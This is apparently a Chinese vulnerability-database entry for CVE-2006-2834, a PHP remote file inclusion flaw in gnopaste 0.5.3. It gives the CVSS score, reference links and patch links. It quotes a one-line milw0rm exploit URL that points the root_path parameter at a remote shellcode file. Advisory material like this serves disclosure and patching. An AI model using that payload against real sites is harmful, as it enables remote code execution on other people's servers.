CVE-2006-2834
CVSS7.5
发布时间 :2006-06-06 16:06:00
修订时间 :2011-03-07 21:37:06
NMCOE    

[原文]PHP remote file inclusion vulnerability in includes/common.php in gnopaste 0.5.3 and earlier allows remote attackers to execute arbitrary PHP code via a URL in the root_path parameter.


[CNNVD]Gnopaste Common.PHP 远程文件包含漏洞(CNNVD-200606-119)

        gnopaste 的includes/common.php中的PHP远程文件包含漏洞,可让远程攻击者通过root_path参数中的URL执行任意PHP代码。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

cpe:/a:gnopaste:gnopaste:0.5.2
cpe:/a:gnopaste:gnopaste:0.5.3

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-2834
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-2834
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200606-119
(官方数据源) CNNVD

- 其它链接及资源

http://www.vupen.com/english/advisories/2006/2078
(UNKNOWN)  VUPEN  ADV-2006-2078
http://www.securityfocus.com/bid/18180
(UNKNOWN)  BID  18180
http://sourceforge.net/project/shownotes.php?release_id=421183&group_id=166450
(UNKNOWN)  CONFIRM  http://sourceforge.net/project/shownotes.php?release_id=421183&group_id=166450
http://sourceforge.net/forum/forum.php?forum_id=576672
(UNKNOWN)  CONFIRM  http://sourceforge.net/forum/forum.php?forum_id=576672
http://securitytracker.com/id?1016189
(UNKNOWN)  SECTRACK  1016189
http://xforce.iss.net/xforce/xfdb/26744
(UNKNOWN)  XF  gnopaste-common-file-include(26744)
http://milw0rm.com/exploits/1851
(UNKNOWN)  MILW0RM  1851

- 漏洞信息

Gnopaste Common.PHP 远程文件包含漏洞
高危 输入验证
2006-06-06 00:00:00 2006-11-03 00:00:00
远程  
        gnopaste 的includes/common.php中的PHP远程文件包含漏洞,可让远程攻击者通过root_path参数中的URL执行任意PHP代码。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复这个安全问题,补丁下载链接:
        http://downloads.sourceforge.net/gnopaste/gnopaste-0.5.4.tgz
        http://downloads.sourceforge.net/gnopaste/gnopaste-0.5.4.tgz

- 漏洞信息 (1851)

gnopaste <= 0.5.3 (common.php) Remote File Include Vulnerability (EDBID:1851)
php webapps
2006-05-30 Verified
0 SmokeZ
N/A [点击下载]
# gnopaste <= 0.5.3 - Remote File Include Vulnerabilities
# Script site: http://sourceforge.net/projects/gnopaste
# made by SmokeZ (smoke.hes@gmail.com)

http://www.site.com/[gnopaste_path]/includes/common.php?root_path=SHELLCODE_URL.txt?

# milw0rm.com [2006-05-30]
		

- 漏洞信息

31043
gnopaste includes/common.php root_path Parameter Remote File Inclusion
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public Vendor Verified

- 漏洞描述

Unknown or Incomplete

- 时间线

2006-05-30 Unknow
2006-05-30 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站